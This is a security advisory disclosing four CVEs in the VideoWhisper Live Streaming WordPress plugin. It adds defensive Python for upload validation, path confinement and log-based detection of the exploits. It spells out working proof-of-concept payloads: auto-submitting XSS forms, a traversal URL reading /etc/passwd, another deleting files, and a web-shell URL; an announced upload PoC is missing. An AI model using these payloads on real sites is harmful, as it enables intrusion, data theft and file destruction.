Advisory ID: HTB23199
Product: VideoWhisper Live Streaming Integration
Vendor: VideoWhisper
Vulnerable Version(s): 4.27.3 and probably prior
Tested Version: 4.27.3
Advisory Publication: February 6, 2014 [without technical details]
Vendor Notification: February 6, 2014
Vendor Patch: February 7, 2014
Public Disclosure: February 27, 2014
Vulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through Externally-Generated Error Message [CWE-211]
CVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908
Risk Level: Critical
CVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of the vulnerable application and delete arbitrary files.

1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905
VideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snapshots.php". A remote attacker can upload and execute an arbitrary PHP file on the target system.
The following PoC code demonstrates exploitation of the vulnerability:
After successful exploitation the remote shell will be accessible via the following URL:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/1.php.jpg
Successful exploitation of this vulnerability requires that the web server is not configured to handle files with the .jpg extension strictly by their media MIME type (i.e. a file named 1.php.jpg must still be passed to the PHP interpreter).
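The reason a name like "1.php.jpg" gets through is that the upload handler only looks at the final extension, while some server configurations (Apache's mod_mime with a PHP handler registered for .php, for instance) treat every dotted segment as an extension and execute the file anyway, which is exactly the web-server condition the advisory notes above. The following Python is an added example written for this advisory, not the plugin's PHP or any vendor code; it contrasts the weak last-extension check with one that requires a single allowlisted extension, verifies the file's leading bytes against the declared image type, and never reuses the client-supplied name on disk. The MAGIC_BYTES table and the allowlist are constructed for the example.

```python
"""Validating an uploaded snapshot's file name and content.

Added example, not the plugin's code: it shows why a last-extension check
accepts the "1.php.jpg" name from the advisory and what a stricter check does.
"""
from __future__ import annotations

import os
import secrets
from typing import List, Optional

ALLOWED_IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes of the formats we accept (constructed table for the example).
MAGIC_BYTES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def naive_is_image(filename: str) -> bool:
    """The weak check: only the final extension is inspected, so 1.php.jpg passes."""
    return filename.lower().endswith((".jpg", ".jpeg", ".png", ".gif"))


def extension_chain(filename: str) -> List[str]:
    """All dotted segments after the base name, lower-cased: '1.php.jpg' -> ['php', 'jpg']."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.split(".")
    return [p.lower() for p in parts[1:]] if len(parts) > 1 else []


def is_safe_image_name(filename: str) -> bool:
    """Hardened check: exactly one extension, taken from the allowlist, and no NUL bytes."""
    if "\x00" in filename:
        return False
    chain = extension_chain(filename)
    # Exactly one extension: this rejects 1.php.jpg, shell.jpg.php and bare names.
    # Multi-extension names matter because some server setups (Apache mod_mime with
    # a handler for .php) run a file as PHP if *any* of its extensions is .php.
    return len(chain) == 1 and chain[0] in ALLOWED_IMAGE_EXTENSIONS


def has_matching_magic(data: bytes, ext: str) -> bool:
    """Content must look like the declared image type; a PHP script does not."""
    return any(data.startswith(sig) for sig in MAGIC_BYTES.get(ext.lower(), ()))


def stored_name_for(filename: str, data: bytes) -> Optional[str]:
    """Return the server-chosen name to save under, or None if the upload is rejected.

    The client's name is never reused: only its validated extension survives, attached
    to a random stem, so nothing the uploader controls reaches the on-disk path.
    """
    if not is_safe_image_name(filename):
        return None
    ext = extension_chain(filename)[0]
    if not has_matching_magic(data, ext):
        return None
    return f"{secrets.token_hex(16)}.{ext}"
```

Even with this check in place, the snapshot directory should be served with script execution disabled (no PHP handler for that path), so that a future validation bug does not turn an image directory back into a code-execution path.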
2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906
2.1 The vulnerability exists due to insufficient filtration of the "m" HTTP POST parameter in the "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary HTML and script code in the browser in the context of the vulnerable website when a user visits a page with the plugin's widget enabled. The script will also be executed in the administrative section on the following page:
http://[host]/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=live
The exploitation example below uses the "alert()" JavaScript function to display the word "immuniweb":
<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" method="post">
<input type="hidden" name="s" value="1">
<input type="hidden" name="u" value="1">
<input type="hidden" name="r" value="1">
<input type="hidden" name="m" value="<script>alert('immuniweb')</script>">
</form>
</body>

2.2 The vulnerability exists due to insufficient filtration of the "msg" HTTP POST parameter in the "/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary HTML and script code in the browser in the context of the vulnerable website when a user visits the affected page.
The exploitation example below uses the "alert()" JavaScript function to display the word "immuniweb":
<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php" method="post">
<input type="hidden" name="msg" value="<script>alert('immuniweb')</script>">
<input type="hidden" name="r" value="1">
</form>
</body>
The code will be executed when the user visits the following URL:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/uploads/[room]/Log[date].html
Where [room] is set by the HTTP POST parameter r and [date] is the current date.

2.3 The vulnerabilities exist due to insufficient filtration of the "n" HTTP GET parameter passed to the scripts "channel.php", "htmlchat.php", "video.php" and "videotext.php" within the "/wp-content/plugins/videowhisper-live-streaming-integration/ls/" directory. A remote attacker can send a specially crafted HTTP GET request to the vulnerable scripts and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
The exploitation examples below use the "alert()" JavaScript function to display the word "immuniweb":
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

2.4 The vulnerability exists due to insufficient filtration of the "message" HTTP GET parameter passed to the "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php" script. A remote attacker can trick a user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
The exploitation example below uses the "alert()" JavaScript function to display the word "immuniweb":
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E

2.5 The vulnerability exists due to insufficient filtration of the "ct" HTTP POST parameter passed to the "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" script. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
The exploitation example below uses the "alert()" JavaScript function to display the word "immuniweb":
<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" method="post">
<input type="hidden" name="s" value="1">
<input type="hidden" name="r" value="1">
<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">
</form>
</body>

2.6 The vulnerability exists due to insufficient filtration of the "ct" HTTP POST parameter passed to the "/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php" script. A remote attacker can trick a user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
The exploitation example below uses the "alert()" JavaScript function to display the word "immuniweb":

<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php" method="post">
<input type="hidden" name="s" value="1">
<input type="hidden" name="r" value="1">
<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">
</form>
</body>
3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907

3.1 The vulnerability exists due to insufficient filtration of the "s" HTTP GET parameter in the "/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php" script. A remote attacker can view the contents of arbitrary files on the target system using directory traversal sequences.
The exploitation example below displays the contents of the "/etc/passwd" file:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php?s=../../../../../../etc/passwd

3.2 The vulnerability exists due to insufficient filtration of the "s" HTTP GET parameter in the "/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences.
The exploitation example below deletes the file "/tmp/immuniweb":
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb
Successful exploitation of this vulnerability requires that the file "/tmp/immuniweb" exists on the system.
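Both 3.1 and 3.2 come down to one mistake: a value from the "s" parameter is joined onto a directory and then read or deleted without checking where the joined path ends up. The Python below is an added example for this advisory, not the plugin's code; it confines a user-supplied session name to its directory in two layers: an identifier allowlist (the SESSION_ID pattern is an assumption, since the advisory does not give the plugin's real format) and a resolved-path check that also catches a symlink planted inside the directory. The demo() function builds a throwaway directory and replays the advisory's two traversal values plus a symlink case against it.

```python
"""Confining a user-supplied session name to its directory before reading or deleting.

Added example, not the plugin's code. rtmp_login.php reads and rtmp_logout.php
deletes a file chosen by the "s" parameter; the advisory shows
"../../../../../../etc/passwd" escaping the intended directory.
"""
from __future__ import annotations

import os
import re
import tempfile
from pathlib import Path

# Shape of a legitimate session identifier (assumption for the example; the
# plugin's real format is not given in the advisory). No leading dot, no slashes.
SESSION_ID = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


class UnsafePath(ValueError):
    """Raised when a user-supplied value would leave the session directory."""


def resolve_within(base_dir: "str | os.PathLike", user_value: str) -> Path:
    """Return base_dir/user_value only if it stays directly inside base_dir."""
    if "\x00" in user_value or not SESSION_ID.match(user_value):
        raise UnsafePath(f"rejected by identifier allowlist: {user_value!r}")
    base = Path(base_dir).resolve()
    candidate = (base / user_value).resolve()  # collapses '..' and follows symlinks
    # Second layer: even a name that passes the allowlist must resolve to a direct
    # child of the base directory (a symlink inside it pointing elsewhere fails here).
    if candidate.parent != base:
        raise UnsafePath(f"escapes {base}: {user_value!r}")
    return candidate


def read_session(base_dir, user_value: str) -> str:
    return resolve_within(base_dir, user_value).read_text()


def delete_session(base_dir, user_value: str) -> bool:
    """Delete the session file; False if it does not exist (never touches anything else)."""
    path = resolve_within(base_dir, user_value)
    if not path.is_file():
        return False
    path.unlink()
    return True


def demo() -> dict:
    """Replay the advisory's traversal values against a constructed directory layout."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp) / "sessions"
        base.mkdir()
        (base / "abc123").write_text("session data")
        outside = Path(tmp) / "secret.txt"  # stands in for a file outside the directory
        outside.write_text("not for you")
        try:
            (base / "link").symlink_to(outside)  # symlink planted inside the base dir
            link_planted = True
        except OSError:  # platforms that refuse to create symlinks
            link_planted = False

        results["legit_read"] = read_session(base, "abc123")
        probes = ["../../../../../../etc/passwd", "../../../../../../../../tmp/immuniweb", ".."]
        if link_planted:
            probes.append("link")
        for bad in probes:
            try:
                read_session(base, bad)
                results[bad] = "ALLOWED"
            except UnsafePath:
                results[bad] = "blocked"
        if not link_planted:
            results["link"] = "skipped"
        results["delete_missing"] = delete_session(base, "nothere")
        results["delete_legit"] = delete_session(base, "abc123")
        results["outside_intact"] = outside.exists()
    return results
```

The allowlist alone would stop the two advisory payloads, since both contain "/"; the resolved-path comparison is what makes the check robust when the naming rules are later loosened or when the directory contents are not fully trusted.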
4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908

4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to the vulnerable scripts and gain knowledge of the full installation path of the application.
The following URLs can be used to gain knowledge of the full installation path of the application:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/bp.php
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/videowhisper_streaming.php
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp.inc.php
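For a site that could not patch immediately, or that wants to know whether it was probed before the update, the request shapes in sections 1 through 4 are all visible in an ordinary web-server access log (with the exception of the POST-body cases in 2.1, 2.2, 2.5 and 2.6, whose parameters are not logged by default). The Python below is an added example written for this advisory, not a vendor or High-Tech Bridge tool; it parses common-log-format lines, restricts itself to the plugin's path, and flags the four patterns: a script-like file name served from the snapshots directory, traversal sequences in the "s" parameter of the two rtmp_*.php scripts, markup in the reflected "n" and "message" parameters, and direct requests to the three files whose error output leaks the install path. SAMPLE_LOG is constructed for the example using documentation IP ranges.

```python
"""Spotting this advisory's request patterns in web-server access logs.

Added example, not vendor tooling. Reads common-log-format lines and flags
requests matching the four issue classes (CVE-2014-1905 .. CVE-2014-1908).
"""
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote

PLUGIN = "/wp-content/plugins/videowhisper-live-streaming-integration/"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Scripts and the reflected parameters named in sections 2.3 and 2.4.
XSS_SINKS = {
    "channel.php": {"n"}, "htmlchat.php": {"n"}, "video.php": {"n"},
    "videotext.php": {"n"}, "lb_logout.php": {"message"},
}
TRAVERSAL_SINKS = {"rtmp_login.php", "rtmp_logout.php"}                        # section 3, parameter "s"
ERROR_PROBE_FILES = {"bp.php", "videowhisper_streaming.php", "ls/rtmp.inc.php"}  # section 4
MARKUP = re.compile(r"</?\s*(script|title|img|svg|iframe)|javascript:|\bon[a-z]+\s*=", re.I)


def classify(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None if nothing in it is suspicious."""
    m = LOG_RE.match(line)
    if not m or not m["target"].startswith(PLUGIN):
        return None
    rel = m["target"][len(PLUGIN):]
    path, _, query = rel.partition("?")
    script = path.rsplit("/", 1)[-1]
    # parse_qs decodes once; unquote again so double-encoded %252e%252e is also seen.
    params = {k: [unquote(v) for v in vs]
              for k, vs in parse_qs(query, keep_blank_values=True).items()}

    def finding(cve: str, detail: str) -> dict:
        return {"ip": m["ip"], "ts": m["ts"], "cve": cve, "script": script, "detail": detail}

    if path in ERROR_PROBE_FILES:
        return finding("CVE-2014-1908", "direct request to include file (full-path disclosure probe)")
    if path.startswith("ls/") and script in TRAVERSAL_SINKS:
        for s in params.get("s", []):
            if "../" in s or "..\\" in s or s.startswith("/"):
                return finding("CVE-2014-1907", f"traversal sequence in s={s!r}")
    if path.startswith("ls/snapshots/"):
        exts = script.lower().split(".")[1:]
        if len(exts) > 1 or any(e.startswith("php") or e == "phtml" for e in exts):
            return finding("CVE-2014-1905", f"script-like file served from snapshot dir: {script}")
    if path.startswith("ls/") and script in XSS_SINKS:
        for name in XSS_SINKS[script]:
            for v in params.get(name, []):
                if MARKUP.search(v):
                    return finding("CVE-2014-1906", f"markup in {name}={v!r}")
    return None


def scan(log_text: str) -> List[dict]:
    """Classify every line; keep only the findings, in log order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


# Constructed sample: one probing client (203.0.113.7) and one normal viewer (198.51.100.4).
SAMPLE_LOG = """\
203.0.113.7 - - [27/Feb/2014:10:01:02 +0000] "GET /wp-content/plugins/videowhisper-live-streaming-integration/ls/channel.php?n=room1 HTTP/1.1" 200 1843
203.0.113.7 - - [27/Feb/2014:10:01:05 +0000] "GET /wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php?s=../../../../../../etc/passwd HTTP/1.1" 200 2011
203.0.113.7 - - [27/Feb/2014:10:01:09 +0000] "GET /wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512
203.0.113.7 - - [27/Feb/2014:10:01:15 +0000] "POST /wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snapshots.php HTTP/1.1" 200 14
203.0.113.7 - - [27/Feb/2014:10:01:16 +0000] "GET /wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/1.php.jpg HTTP/1.1" 200 88
203.0.113.7 - - [27/Feb/2014:10:01:20 +0000] "GET /wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp.inc.php HTTP/1.1" 200 302
198.51.100.4 - - [27/Feb/2014:10:02:00 +0000] "GET /wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/room1.jpg HTTP/1.1" 200 40211
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['cve']} {f['script']}: {f['detail']}")
```

The POST to vw_snapshots.php is deliberately not flagged on its own, since that is the endpoint's normal use; the indicator of a successful upload is the later GET of a multi-extension file from the snapshots directory, which is what the 1.php.jpg rule catches. Stored-XSS attempts through lb_status.php, vc_chatlog.php and v_status.php need request-body logging or a WAF in front of the site to be observed.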
-----------------------------------------------------------------------------------------------
Solution:
Update to VideoWhisper Live Streaming Integration version 4.29.5
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - Multiple Vulnerabilities in VideoWhisper Live Streaming Integration Plugin for WordPress.
[2] VideoWhisper Live Streaming Integration - http://wordpress.org/plugins/videowhisper-live-streaming-integration/ - The VideoWhisper Live Streaming software can easily be used to add video broadcasting features to WordPress sites and live video streams on blog pages.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.